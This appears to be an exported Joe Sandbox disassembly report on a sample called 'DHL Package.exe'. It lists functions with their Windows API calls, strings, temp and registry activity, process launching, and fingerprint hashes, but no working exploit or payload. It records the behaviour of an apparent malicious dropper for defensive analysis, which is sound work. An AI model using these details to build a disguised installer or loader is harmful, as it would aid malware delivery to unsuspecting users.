Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-26219170
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: dda0a131242ff184f2ccb02743bd446f17612fd9a9d8f3d2581d745ec2ea809b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 010108B1C00219EADF009BA0C944BEFBBB4EB04364F00803AD945B6180D77996488FA9

Function 00406760 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
wsprintfW.USER32 ref: 004067B2
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067C6

Strings

%s%S.dll, xrefs: 004067AC
UXTHEME, xrefs: 00406769
\, xrefs: 00406788

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 9186df788a023ca5baadb024e2a35ee1fdde68eb784542ec1ecc189bc894a2fc
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: 7EF0F670510119ABCB14AF64DD0DF9B37ACAB00309F10047AA646F20D0EB7CAA68CBA8

Function 0040324C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004032AD
GetTickCount.KERNEL32 ref: 0040332E
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 0040335B
wsprintfW.USER32 ref: 0040336E

Strings

... %d%%, xrefs: 00403368

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 8d2148dea1357cc769a9c152517c4f4ee24e97c37e9ec66b050655bdb75eae1c
Instruction ID: 0c386ab0f0708696bc676c49e8997792277d61a4d185bd6037e20a9e3331648f
Opcode Fuzzy Hash: 8d2148dea1357cc769a9c152517c4f4ee24e97c37e9ec66b050655bdb75eae1c
Instruction Fuzzy Hash: 7E516D71900219EBCB10DF65D984B9F3FA8AB00766F14417BFC10B72C1DB789E508BA9

Function 00405F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405F1E
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DHL Package.exe",0040348D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9), ref: 00405F39

Strings

"C:\Users\user\Desktop\DHL Package.exe", xrefs: 00405F00
nsa, xrefs: 00405F0D
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F05

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\DHL Package.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2447530259
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: 92234304539bf7ece852ec87847853e593a29ed380df2f8ac1d63cab01e19b90
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 9DF09076B00204BBEB00CF59ED09E9FB7ACEB95750F11803AEA44F7140E6B499548B68

Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
Instruction ID: 0e68a9e52e1d6489b1d96d2929a27e43e5cdd4abb6d38d1bd7d6776dab24ddff
Opcode Fuzzy Hash: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
Instruction Fuzzy Hash: 62215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11A0E7B48E54AAA8

Function 6CA71777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

Part of subcall function 6CA71B5F: GlobalFree.KERNEL32(?), ref: 6CA71DD4
Part of subcall function 6CA71B5F: GlobalFree.KERNEL32(?), ref: 6CA71DD9
Part of subcall function 6CA71B5F: GlobalFree.KERNEL32(?), ref: 6CA71DDE

GlobalFree.KERNEL32(00000000), ref: 6CA71825
FreeLibrary.KERNEL32(?), ref: 6CA718AB
GlobalFree.KERNEL32(00000000), ref: 6CA718D0

Part of subcall function 6CA7239E: GlobalAlloc.KERNEL32(00000040,?), ref: 6CA723CF

Part of subcall function 6CA72770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6CA717F6,00000000), ref: 6CA72840

Part of subcall function 6CA715C6: wsprintfW.USER32 ref: 6CA715F4

Strings

, xrefs: 6CA718B1

Memory Dump Source

Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true

Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 7babacb5cad028c59e2170eb4e76f12d389f3852e1fefe4c1ec5af779579d78f
Instruction ID: 66553681895c7755e059aee1c52183c4618e252652bdd0ccbe20e3d1f7ada5ab
Opcode Fuzzy Hash: 7babacb5cad028c59e2170eb4e76f12d389f3852e1fefe4c1ec5af779579d78f
Instruction Fuzzy Hash: 7041E4795003059ADF348F7499ACBE537E8BB05319F184675EA1D9AA82DB78C0CD87B0

Function 00402482 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl98D6.tmp,00000023,00000011,00000002), ref: 004024CD
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsl98D6.tmp,00000000,00000011,00000002), ref: 0040250D
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsl98D6.tmp,00000000,00000011,00000002), ref: 004025F5

Strings

C:\Users\user\AppData\Local\Temp\nsl98D6.tmp, xrefs: 004024BE, 004024CC, 004024E3, 004024F7, 00402502

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp
API String ID: 2655323295-2066866256
Opcode ID: 719a10b40097e7594d3a00bce5270b52fea52596e69aedda1ab21f77c9f23a5e
Instruction ID: 5961cf0302e183f44fe6dca2e080a575d9ce570cefe28a5469520932bfc38106
Opcode Fuzzy Hash: 719a10b40097e7594d3a00bce5270b52fea52596e69aedda1ab21f77c9f23a5e
Instruction Fuzzy Hash: D711AF71E00108BEDB10AFA5DE49AAE7BB9EF44314F21443AF504B71D1D6B88D419668

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405D5B: CharNextW.USER32(?,?,00425F10,?,00405DCF,00425F10,00425F10,77163420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D69
Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D6E
Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D86

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405912: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405955

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\peggle\Dilettantkomediers,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\peggle\Dilettantkomediers, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\peggle\Dilettantkomediers
API String ID: 1892508949-4134240001
Opcode ID: 0a8316340f92e831056d46a796daf77011545e4f9da01359f8b8fa5e627cb0d4
Instruction ID: 4b740b80641ba3a3eb8a8ec9adfde8f0bc1f07408697dd7e04d4643b588e1c06
Opcode Fuzzy Hash: 0a8316340f92e831056d46a796daf77011545e4f9da01359f8b8fa5e627cb0d4
Instruction Fuzzy Hash: 1411E231504114EBCF206FA5CD4199F37B0EF24328B28493BE912B12F1D63E49829B6E

Function 004062A9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,00406538,80000002), ref: 004062EF
RegCloseKey.KERNELBASE(?,?,00406538,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 004062FA

Strings

Call, xrefs: 004062B0

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: ae085d710551058a7f2532bbeea434883cb59e3c9f2bcee9d1549068d4bd9198
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: B9015A72500209EADF218F51CC09EDB3BA8EF95364F01803AFD1AA6190D738D968DFA4

Function 004059C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,Error launching installer), ref: 004059ED
CloseHandle.KERNEL32(?), ref: 004059FA

Strings

Error launching installer, xrefs: 004059D7

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
Instruction ID: 20697c874bd4b9c747bb4d9041eb299060a3c9f0112610a55a8a246a05e7abf4
Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
Instruction Fuzzy Hash: 7DE0BFB46002097FEB109B64ED45F7B77ACEB04708F414966BD50F6150DB7499158E7C

Function 00406F2F Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
Instruction ID: 32e2ab4cb65e7230aeff806a84dbae4d22e6cbaaf638251473bf6dacb733d759
Opcode Fuzzy Hash: de1cc7ed33cb2a5f92ceea0e0b8826ef96c457053bcc9743bcab908c31a2c9eb
Instruction Fuzzy Hash: 29A13231E04229CBDF28CFA8C8546ADBBB1FF45305F14806ED856BB281D7786A86DF45

Function 00407130 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
Instruction ID: e827159e3c0f30117cfd40fb8871c1536360b3329485a12100fd3651e411c43c
Opcode Fuzzy Hash: 28c06f0f4c89ef22b384ceac7e4294a2f4c1bbf82e27332dac04b45cf64da018
Instruction Fuzzy Hash: A4912230E04228CBDF28CFA8C854BADBBB1FB45305F14816ED852BB281C7786986DF45

Function 00406E46 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
Instruction ID: e886ca087a0a39174fbb15e481659c292d22b9db4249bf85fd90a7a13df170d2
Opcode Fuzzy Hash: 181c382312786495426148394ea48e56d5a70372e8d229e03138d7b713aa5dd8
Instruction Fuzzy Hash: 99813671E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB291C7785986DF45

Function 0040694B Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
Instruction ID: 102eaf4500afa36507883bc49c2e43cf6988b9622fad8f3b05d2dee193d28093
Opcode Fuzzy Hash: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
Instruction Fuzzy Hash: 59814631E04228DBEB24CFA8C8447ADBBB1FB45305F24816AD856BB2C1D7786986DF45

Function 00406D99 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

